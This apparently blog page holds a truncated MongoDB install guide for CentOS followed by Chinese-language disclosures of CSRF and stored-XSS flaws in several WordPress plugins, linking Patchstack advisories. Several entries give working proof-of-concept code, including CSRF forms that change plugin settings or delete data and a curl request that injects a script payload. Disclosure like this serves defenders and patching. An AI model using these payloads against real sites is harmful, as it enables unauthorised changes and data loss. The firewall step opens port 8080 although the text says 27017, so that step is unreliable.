由于近期有个项目需要用到MONGODB,所以今天简单聊聊MONGODB的一个安装 首先需要配置MONGODB的源 vi /etc/yum.repos.d/mongodb-org-4.2.repo 直接创建文件并输入 [mongodb-org-4.2] name=MongoDB Repository baseurl=https://repo.mongodb.org/yum/redhat/$releasever/mongodb-org/4.2/x86_64/ gpgcheck=1 enabled=1 gpgkey=https://www.mongodb.org/static/pgp/server-4.2.asc 接下来直接进行yum安装 yum install -y mongodb-org 等待数分钟后安装完成 systemctl start mongod.service 开启MONGODB服务 同时需要开放27017端口,在CENTOS7里面已经没有IPTABLES了,需要安装FIREWALLD firewall-cmd –zone=public –add-port=8080/tcp –permanent 带上permanent参数防止服务器重启后又给关闭了 此时mongodb已经成功安装并启动 mongodb默认是本地访问,此时我们修改BILDIP使得我们可以远程进行访问 …
WordPress Read more By Adam plugin <= 1.1.8 - CSRF漏洞
详细漏洞信息请查看: https://patchstack.com/database/vulnerability/read-more/wordpress-read-more-by-adam-plugin-1-1-8-cross-site-request-forgery-csrf-vulnerability
WordPress Add Shortcodes Actions And Filters plugin <= 2.0.9 管理员后台出现XXS漏洞
POC如下: Dashboard—->Tools—->Shortcodes,Actions and Filters—->Add New —->fill name with “> and then fill any value with others. and then click “save” botton after done that,there would be the stored xxs 主要还是因为一些特殊字符如>等没有过滤从而导致了存储型的XXS
WordPress YDS Support Ticket System plugin <= 1.0 -CSRF漏洞
由于缺少对权限的控制以及nonce的判断,从而导致CSRF漏洞 POC如下: < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=deleteCategory" method="POST" enctype="multipart/form-data"> < input type="hidden" name="catId" value="1"> < input type="submit" name="Submit"> < /form> < /body> < /html> 提交完后从而修改了CATID的值
WordPress PCA Predict plugin <= 1.0.3 管理员后台的XXS漏洞
由于缺少对特殊字符的过滤导致后台出现XXS漏洞 POC如下: Dashboard—->Settings—->PCA Predict—>—->把这串代码填入 “> 然后保存即可看到XXS
WordPress add2fav plugin <= 1.0 - XSS漏洞
由于没有过滤一些字符,从而导致可以构造闭合,并造成XSS POC如下: curl ‘http://exsample.com/wp-admin/options-general.php?page=add2fav_uid’ –data ‘add2fav_hidden=Y&add2fav_label_add= %22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript %3E&add2fav_label_rem=Remove+from+Favorites &add2fav_label_reg=&add2fav_label_off=%23&Submit=Save+Changes’
WordPress WP Shop plugin <= 3.9.6 - 任意用户CSRF导致数据更新和删除
由于没有对AJAX进行有效的权限判断和NONCE验证,从而导致任意用户都可以更改插件的配置 以及对一些重要数据的删除 详细情况请看这里:https://patchstack.com/database/vulnerability/wp-shop-original/wordpress-wp-shop-plugin-3-9-6-unauthenticated-plugin-settings-change-data-deletion-vulnerabilities
WordPress Add User Role plugin <= 0.0.1 - XXS漏洞
由于没有对一些特殊字符过滤,便可以添加闭合字符,从而导致XXS漏洞 POC如下: Dashboard—->Users—->My Role—>Create new user—->fill the Role Name with “> and then click the “add user”
access-code-feeder < 1.0.3 subscriber权限下CSRF导致的插件更新
POC如下: < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=base_url_action" method="POST" enctype="multipart/form-data"> < input type="hidden" name="new_url" value="http://www.google.com"> < input type="submit" name="Submit"> < /form> < /body> < /html> 漏洞详情:https://patchstack.com/database/vulnerability/access-code-feeder/wordpress-access-code-feeder-plugin-1-0-3-cross-site-request-forgery-csrf-vulnerability
about-me < = 1.0.12 subscriber权限下 CSRF导致插件配置更新
POC如下 < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=social_links_delete_network" method="POST" enctype="multipart/form-data"> < input type="hidden" name="linkId" value="1"> < input type="submit" name="Submit"> < /form> < /body> < /html> 执行完会导致直接删除了ID为1的社交网络帐号